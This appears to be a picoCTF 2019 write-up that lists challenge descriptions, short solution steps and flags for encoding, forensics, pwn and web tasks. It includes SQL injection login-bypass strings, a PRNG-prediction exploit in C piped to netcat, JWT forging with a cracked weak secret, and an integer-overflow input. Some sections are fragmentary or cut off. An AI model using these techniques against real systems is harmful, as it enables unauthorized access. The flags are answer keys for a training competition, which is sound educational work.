| 50 points
Author: Sanjay C/Danny Tunitis
Description
If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?
0x70 = p
==picoCTF{p}==
Warmed Up
| 50 points
Author: Sanjay C/Danny Tunitis
Description**
What is 0x3D (base 16) in decimal (base 10)?
==picoCTF{61}==
2Warm
| 50 points
Author: Sanjay C/Danny Tunitis
Description
Can you convert the number 42 (base 10) to binary (base 2)?
==picoCTF{101010}==
what's a net cat?
| 100 points
Author: Sanjay C/Danny Tunitis
Description
Using netcat (nc) is going to be pretty important. Can you connect to jupiter.challenges.picoctf.org at port 41120 to get the flag?
nc jupiter.challenges.picoctf.org 41120
==picoCTF{nEtCat_Mast3ry_3214be47}==
strings it
| 100 points
Author: Sanjay C/Danny Tunitis
Description
Can you find the flag in file without running it?
strings file | grep "picoC"
==picoCTF{5tRIng5_1T_7f766a23}==
Bases
| 100 points
Author: Sanjay C/Danny T
Description
What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.
==picoCTF{l3arn_th3_r0p35}==
First Grep
| 100 points
Author: Alex Fulton/Danny Tunitis
Description
Can you find the flag in file? This would be really tedious to look through manually, something tells me there is a better way.
strings file | grep "picoC"
==picoCTF{grep_is_good_to_find_things_5af9d829}==
Based
| 200 points
Author: Alex Fulton/Daniel Tunitis
Description
To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337? Connect with nc jupiter.challenges.picoctf.org 29956.
| 200 points
Author: Alex Fulton/Danny Tunitis
Description
Sometimes you need to handle process data outside of a file. Can you find a way to keep the output from this program and search for the flag? Connect to jupiter.challenges.picoctf.org 4427.
| 300 points
Author: Danny
Description
I wrote you a song. Put it in the picoCTF{} flag format.
Pico's a CTFFFFFFF
my mind is waitin
It's waitin
Put my mind of Pico into This
my flag is not found
put This into my flag
put my flag into Pico
shout Pico
shout Pico
shout Pico
--- snippet---
==picoCTF{rrrocknrn0113r}==
flag_shop
| 300 points
Author: Danny
Description
There's a flag shop selling stuff, can you buy a flag? Source. Connect with nc jupiter.challenges.picoctf.org 9745.
#include <stdio.h>
#include <stdlib.h>
int main()
{
setbuf(stdout, NULL);
int con;
con = 0;
int account_balance = 1100;
if(number_flags > 0){
int total_cost = 0;
total_cost = 900*number_flags;
printf("\nThe final cost is: %d\n", total_cost);
if(total_cost <= account_balance){
account_balance = account_balance - total_cost;
printf("\nYour current balance after transaction: %d\n\n", account_balance);
}
else{
printf("Not enough funds to complete purchase\n");
}
else if(auction_choice == 2){
printf("1337 flags cost 100000 dollars, and we only have 1 in stock\n");
printf("Enter 1 to buy one");
int bid = 0;
fflush(stdin);
scanf("%d", &bid);
Initial value in account 1100 and the flag price 100000. It so much different here. But the vuln can be found if we manage to get total cost into negative value? But how? Here the problem since we cannot enter negative value. How about interger overflow?
3000000
==picoCTF{m0n3y_bag5_65d67a74}==
1_wanna_b3_a_r0ck5tar
Description
I wrote you another song. Put the flag in the picoCTF{} flag format
==picoCTF{BONJOVI}==
Forensics
Glory of the Garden
| 50 points
Tags:
Author: jedavis/Danny
Description
This garden contains more than it seems.
strings file
==picoCTF{more_than_m33ts_the_3y33dd2eEF5}==
So Meta
| 150 points
Tags:
Author: Kevin Cooper/Danny
Description
Find the flag in this picture.
strings filename
exiftool filename
==picoCTF{s0_m3ta_d8944929}==
Shark on wire 1
| 150 points
Tags:
Author: Danny
Description
We found this packet capture. Recover the flag.
The file stream in UDP, follow the UDP and get the flag.
==picoCTF{StaT31355_636f6e6e}==
extensions
| 150 points
Tags:
Author: Sanjay C/Danny
Description
This is a really weird text file TXT? Can you find the flag?
tesseract f.png outputbase
==picoCTF{now_you_know_about_extensions}==
What Lies Within
| 150 points
Tags:
Author: Julio/Danny
Description
There's something in the building. Can you retrieve the flag?
zsteg imge
==picoCTF{h1d1ng_1n_th3_b1t5}==
m00nwalk
| 250 points
Tags:
Author: Joon
Description
Decode this message from the moon.
Using qsstv to intercept the sound and convert into image.
==picoCTF{beep_boop_im_in_space}==
WhitePages
| 250 points
Tags:
Author: John Hammond
Description
I stopped using YellowPages and moved onto WhitePages... but the page they gave me is all blank!
from pwn import *
with open("whitepages.txt", "rb") as bin_file:
data = bytearray(bin_file.read())
data = data.replace(b'\xe2\x80\x83', b'0')
data = data.replace(b'\x20', b'1')
data = data.decode("ascii")
print unbits(data)
E2 80 83 = 0
20 = 1
Convert all and change to ascii.
Author: Danny
Description
We found this file. Recover the flag.
==picoCTF{c0rrupt10n_1847995}==
like1000
| 250 points
Tags:
Author: Danny
Description
This .tar file got tarred a lot.
PWN
seed-sPRiNG
| 350 points
Tags:
Author: John Hammond
Description
The most revolutionary game is finally available: seed sPRiNG is open right now! seed_spring. Connect to it with nc jupiter.challenges.picoctf.org 34558.
The seed will taken by current time. So we need to create a random_seed generator and send it to service.
//solve.c
//gcc -o solve solve.c
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
int main ()
{
int i;
srand(time(0));
for (i = 0; i < 30; i++)
{
printf("%d\n", rand() & 0xf);
}
return 0;
}
//./solve | nc jupiter.challenges.picoctf.org 34558
Do you think you can log us in? Try to see if you can login!
/support.html
Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error
Can you help me find my parents. I think they were Irish.
Basically SQL error point to SQL Injection. Let try inject in password form.
' or '1'='1' --
==picoCTF{s0m3_SQL_c218b685}==
Irish-Name-Repo 2
| 350 points
Tags:
Author: Xingyang Pan
Description
Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login!
admin'--
It just filter password not username. Inject still can be happen.
==picoCTF{m0R3_SQL_plz_fa983901}==
Irish-Name-Repo 3
| 400 points
Tags:
Author: Xingyang Pan
Description
Try to see if you can login as admin!
using curl to debug the operation happen.
curl IP --data "password=test&debug=1"
Somehow it happened to have some encryption with rot13. Let's put our payload
`' or 1=1'-- to ' be 1=1--'
==picoCTF{3v3n_m0r3_SQL_06a9db19}==
JaWT Scratchpad
| 400 points
Tags:
Author: John Hammond
Description
Check the admin scratchpad!
We cannot login as admin, but can be anybody.
Change the jwt cookies from our name to admin.
using JWT.io to decode.
Using JTR to crack sha256.
Change user to admin
Weak credential - ilovepico
Author: John Johnson
Description
The image link appears broken..
Java Script Kiddie 2
| 450 points
Tags:
Author: John Johnson
Description
The image link appears broken... twice as badly...
Resources Tools
https://codewithrockstar.com/online
https://deobfuscate.relative.im/
Last updated
Rockstar esolag. Decode it .
| 350 points
Author: Alex Bushkin
The Rockstar language has changed since this problem was released! Use this Wayback Machine URL to use an older version of Rockstar, here.
Open the browser and try to get the flag.
You're not Picobrowser! Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0